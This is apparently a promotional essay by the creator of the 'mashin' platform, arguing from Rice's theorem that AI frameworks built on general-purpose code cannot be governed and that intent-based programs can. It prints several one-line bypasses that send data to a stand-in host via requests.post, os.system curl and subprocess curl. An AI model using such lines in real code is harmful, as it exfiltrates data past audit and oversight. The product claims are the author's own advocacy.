The Right Level of Abstraction — Structured Thoughts

Why AI governance verification is provably undecidable, and provably structural, depending on where you stand

“A change in perspective is worth 80 IQ points.” Alan Kay said that in 1982. He was talking about programming language design, but the insight applies anywhere a field gets stuck.

The AI governance industry is stuck.

I sensed this before I could name it. I’d been interested in building systems that could reason about themselves since high school. When LLMs opened the door, I dove in, helped friends build intelligent systems, used every framework the ecosystem offered. And I spent 95% of my time on plumbing, not intelligence. The systems I built couldn’t be handed over. The people who understood their domains couldn’t own what I’d created for them. I was making consulting engagements, not software. The problem was structural, and it took a 1953 theorem to tell me why.

Billions of dollars. Hundreds of startups. A $492M market that Gartner projects will double by 2030. Enterprise teams building policy dashboards, compliance checklists, monitoring overlays, bias detectors, guardrail frameworks. An entire category of venture-funded companies whose pitch decks all say the same thing: “We make AI safe.”

None of them can. Not because they lack talent or funding. Because they’re solving the problem at the wrong level of abstraction.

The three levels

Look at the AI workflow landscape and you’ll find tools clustered at two levels, with a gap in between.

Level one: code frameworks. LangChain, CrewAI, AutoGen, Semantic Kernel. You write Python or TypeScript. You get maximum flexibility. You can call any API, import any library, execute arbitrary logic. These frameworks are productive. Engineers love them. They’re also ungovernable, for reasons that are mathematical, not practical.

Level two: no-code builders. n8n, Zapier, Make, Flowise. You drag boxes and connect lines. The platforms are safe because the vocabulary is restricted. You can only do what the builder exposes. But that restriction cuts both ways. The moment your workflow needs something the builder didn’t anticipate, you’re stuck. Or you drop down to a code node, and you’re back at level one.

The industry treats this as a tradeoff. More expressiveness means less governance. More governance means less expressiveness. Pick your position on the spectrum.

It isn’t a spectrum. It’s a false dichotomy created by operating at the wrong abstraction level. There’s a third level where you get both.

Rice’s theorem

In 1953, Henry Gordon Rice proved a theorem that should be on the wall of every AI governance company’s office. It says: no algorithm can decide any non-trivial semantic property of programs in a Turing-complete language.

Let that settle for a moment.

A “non-trivial semantic property” is any property that some programs have and others don’t. “This program always routes its API calls through an audit layer.” “This program never sends data to an external server without approval.” “This program’s effects are fully governed.”

Rice proved you cannot build a checker that reliably determines whether arbitrary programs satisfy these properties. Not “it’s hard.” Not “it requires more compute.” Impossible. Provably, mathematically, permanently impossible. The proof is a straightforward reduction from the halting problem.

Here’s what this means for AI governance. Every framework that gives you a general-purpose language (Python, TypeScript, whatever) and then tries to ensure governance over what that code does is attempting something Rice proved cannot be done. The guardrails, the callbacks, the permission systems, the audit wrappers: they are convention. They work when every developer, every plugin, every AI-generated code snippet voluntarily cooperates. They fail the moment anything doesn’t.

And in a Turing-complete language, there is always a way to not cooperate.

# Every AI framework's governance, bypassed:
requests.post("https://external.com", json=sensitive_data)

One line. No imports beyond the standard HTTP library. No special privileges. The audit layer doesn’t see it. The governance callbacks don’t fire. The permission system doesn’t know it happened. The code computed a side effect that the framework’s governance architecture had no mechanism to prevent, because Rice’s theorem says no such mechanism can exist for arbitrary programs.

This is not a bug in LangChain or CrewAI. It is a property of every system that tries to govern Turing-complete code from the outside. The impossibility is inherent in the computational model.

The fix is well-understood in mathematics. When you need to prove things about a system, you choose a system where those things are provable. You don’t insist on using a system too powerful for your proofs and then complain that proving things is hard.

The same fix applies to governance.

The intent-driven insight

What if programs didn’t produce effects? What if they produced intents?

In every framework at level one and level two, when code says “send this email” or “call this API,” the action happens immediately. The program is the effect. There is no moment between deciding and doing. Governance has to catch effects in flight, which is what Rice proved you can’t reliably do.

But intents are different. An intent is a data structure: “I want to send this email, to this person, with this content.” It describes what should happen. It doesn’t make it happen. The gap between the intent and the effect is where governance lives. Put simply: governance is a property of the translation layer between what the program wants and what actually happens. No translation layer, no governance. Create the translation layer, and governance becomes a natural property of the system.

mashin is built on this insight. Programs produce intents (we call them directives). Every action, every API call, every model invocation, every external interaction is an intent first, passed to a governance interpreter, and an effect only if governance approves. The program says what it wants. The platform decides whether it happens.

The language has five step types. Each one reflects a kind of cognitive intent:

:compute for pure computation. No I/O by construction. The capability is absent, not blocked. The code computes a result from its inputs and returns it. That’s all it can do.

:reason for inference. The intent is “I need to think about this.” The platform mediates every model call: which model, what prompt, what response. Every inference is recorded, metered, auditable.

:remember for semantic storage. The intent is “I need to store or recall this.” Reads and writes to the knowledge layer go through the platform.

:call for invoking other machines. The intent is “I need another machine to handle this.” Inter-machine communication follows defined interfaces.

:decide for control flow. Pure. No effects, just routing. The intent is “given this, what’s next?”

These five types are not a simplification. They’re not “training wheels” or “guardrails” or a “subset of what you can do in Python.” They’re a change in abstraction level. Programs at this level produce structured intents, not arbitrary effects. And at this level, six things change at once.

Governance is free. Not “easier.” Free. Every step that reaches outside the machine produces an intent, and every intent passes through the governance interpreter. There is no escape hatch, no raw I/O primitive, no way to import requests and fire off an HTTP call. The vocabulary doesn’t include ungoverned effects. Rice’s theorem doesn’t apply because the semantic property “all effects are governed” is satisfied structurally by every program in the language. To be clear: the platform is fully Turing-complete. You can compute anything. What you can’t do is produce an effect without expressing the intent first. The constraint is on how effects enter the world, not on what you can compute. That’s the key distinction Rice’s theorem actually draws: it’s about semantic properties of arbitrary programs, not about computational power. mashin preserves the power and constrains the effects.

AI generation is tractable. Five intent types with well-defined interfaces, not the infinite space of possible Python programs. The search space is finite. The error space is finite. Generation becomes a solvable problem.

Human intent maps directly. “Get the data, think about it, decide what to do, take action.” That maps one-to-one onto :compute, :reason, :decide, :call. The gap between what a person means and what the program says collapses to nearly zero. Programs read like plans because they are plans: structured descriptions of cognitive intent.

Intelligibility is inherent. Anyone can read a machine definition and understand what it does: a new engineer, an auditor, a regulator. Not because the code is well-commented. Because five intent types, named steps, and explicit data flow make the machine its own documentation.

Audit trails are automatic. In an intent-driven architecture, every action is a data structure before it’s an effect. Recording it in an append-only ledger is trivial, not a separate infrastructure concern. The audit trail is a natural consequence of the architecture, not a feature you build.

Composition works. If a machine only contains :compute and :decide steps, it produces no intents that reach outside. If it calls another machine via :call, you know exactly which machine and what its interface is. The composition of two governed machines is a governed machine. You can verify the whole by verifying the parts.

These aren’t six separate features. They’re six consequences of one decision: building an intent-driven architecture at the right level of abstraction. The problems don’t get solved independently. They collapse together. You don’t get governance and then, separately, work on audit trails and then, separately, work on AI generation. You make programs produce intents instead of effects, and all six fall out for free.

The one-line test

Here’s a way to evaluate any AI workflow platform. Open the development environment. Try to write one line that sends data to an external server without the platform knowing.

In LangChain: requests.post(url, data=payload). Works.

In CrewAI: os.system("curl https://external.com"). Works.

In AutoGen: subprocess.run(["curl", url]). Works.

In an intent-driven language: that line doesn’t exist. Not because it’s blocked by a linter. Not because a reviewer would catch it. Not because a runtime check would flag it. The vocabulary of the language doesn’t include it. There is no function, no primitive, no escape hatch that produces an ungoverned effect. Every external action is an intent, and every intent goes through governance.

The problem didn’t get solved. It stopped existing.

This is the operational meaning of “the right level of abstraction.” At the code level, governance bypass is a single line of Python. At the intent level, governance bypass is a category error, like asking what’s north of the North Pole. The question doesn’t parse.

The false tradeoff

The obvious objection: “But you’ve given up expressiveness. What if I need to do something your five step types don’t support?”

This confuses expressiveness with escape velocity. The five intent types are a compositional vocabulary. :compute steps are pure computation: no I/O by construction. When a workflow needs Python, JavaScript, or Rust, it expresses that intent via :call to a governed effect machine. Computation is fully expressive. What it can’t do is produce ungoverned effects. It can’t send an email, call an API, or write to a database without expressing the intent through governance first.

Effects happen through machines. An HTTP request goes through @mashin/actions/http/get. A database write goes through a governed data machine. An email send goes through a governed notification machine. Each of these effect machines has its own governance policy, its own audit trail, its own approval requirements. The intent is always visible before the effect occurs.

The expressiveness isn’t reduced. It’s restructured. You can express anything you could express in Python. You just express it as intent, which means governance, audit trails, and composition come free.

The analogy to SQL is instructive but incomplete. Nobody complains that SQL “limits expressiveness” because you can’t write arbitrary C inside a query. The constraint is the point. SQL is expressive enough for data operations, and the constraint that it’s not Turing-complete is what makes query optimization, access control, and transaction isolation possible.

mashin goes further. The platform is Turing-complete. You can express any algorithm, any computation, any logic you could write in Python or any other general-purpose language. What’s constrained is not what you can compute but how you can affect the world: every effect must be expressed as an intent. The expressiveness boundary and the governance boundary are coterminous: you get full computational power and full governance simultaneously, not one at the expense of the other. We proved this formally. SQL traded expressiveness for guarantees. mashin doesn’t have to.

Standing in the right place

Einstein, paraphrased: you can’t solve a problem from the same level of thinking that created it. The AI governance problem was created at the code level, where general-purpose languages give you infinite expressiveness and Rice’s theorem takes away your ability to prove anything about what that expressiveness does.

The answer isn’t better guardrails. It isn’t more callbacks. It isn’t fancier monitoring dashboards or larger compliance teams or smarter static analysis. All of those approaches accept the premise that governance must be achieved over arbitrary code. Rice proved that premise leads nowhere.

The answer is intent-driven architecture. Programs that produce intents instead of effects. A level of abstraction where governance isn’t a feature you add but a property you can’t remove.

This follows the pattern of every major advance in computing. Operating systems absorbed resource management. Databases absorbed transactional consistency. Distributed systems absorbed coordination. Each time, a class of problems that application developers solved repeatedly and badly was absorbed into the platform.

Governance of autonomous intelligent systems is the next instance.

A developer who builds on an intent-driven medium never writes governance code, the same way a developer who writes SQL never implements their own transaction isolation. The infrastructure overhead is zero, because governance is the architecture. Audit trails are free, because every intent is a data structure that records itself. Trust progression is configurable, because every intent passes through a governance interpreter that can enforce whatever policy the deployment requires.

And the machines are not data structures parsed at runtime. They compile to BEAM bytecode. Intent-driven systems run at VM speed, not at interpreter speed. Building governed systems becomes simpler, not harder, than building ungoverned ones.

Rice’s theorem applies to everyone building in this space. The wall is the same wall. General-purpose languages cannot structurally guarantee governance properties. Every team that tries will discover this, sooner or later.

mashin is already on the other side. 572 machine-checked Rocq theorems prove the formal properties. The playing field is defined.

Alan McCann is the creator of mashin, an intent-driven computing platform where AI workflows compile to a production VM with structural governance, formally verified by 572 machine-checked Rocq theorems.